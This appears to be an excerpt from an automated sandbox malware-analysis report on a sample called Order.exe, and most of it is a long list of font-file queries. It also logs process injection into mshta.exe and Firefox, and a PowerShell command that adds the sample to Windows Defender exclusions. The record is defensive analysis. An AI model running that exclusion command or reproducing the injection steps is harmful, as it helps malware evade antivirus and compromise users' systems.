                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\Order.exeMemory written: C:\Users\user\Desktop\Order.exe base: 400000 value starts with: 4D5AJump to behavior
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: NULL target: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: NULL target: C:\Windows\SysWOW64\mshta.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: NULL target: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: NULL target: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                  Modifies the context of a thread in another process (thread injection)
                  Source: C:\Windows\SysWOW64\mshta.exeThread register set: target process: 7100Jump to behavior
                  Queues an APC in another process (thread injection)
                  Source: C:\Windows\SysWOW64\mshta.exeThread APC queued: target process: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess created: C:\Users\user\Desktop\Order.exe "C:\Users\user\Desktop\Order.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess created: C:\Users\user\Desktop\Order.exe "C:\Users\user\Desktop\Order.exe"Jump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                  Source: mkvfHfXifKJWp.exe, 00000007.00000000.1815526970.0000000001581000.00000002.00000001.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 00000007.00000002.4143739909.0000000001581000.00000002.00000001.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000002.4144032980.0000000000C91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: mkvfHfXifKJWp.exe, 00000007.00000000.1815526970.0000000001581000.00000002.00000001.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 00000007.00000002.4143739909.0000000001581000.00000002.00000001.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000002.4144032980.0000000000C91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: mkvfHfXifKJWp.exe, 00000007.00000000.1815526970.0000000001581000.00000002.00000001.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 00000007.00000002.4143739909.0000000001581000.00000002.00000001.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000002.4144032980.0000000000C91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: mkvfHfXifKJWp.exe, 00000007.00000000.1815526970.0000000001581000.00000002.00000001.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 00000007.00000002.4143739909.0000000001581000.00000002.00000001.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000002.4144032980.0000000000C91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Users\user\Desktop\Order.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
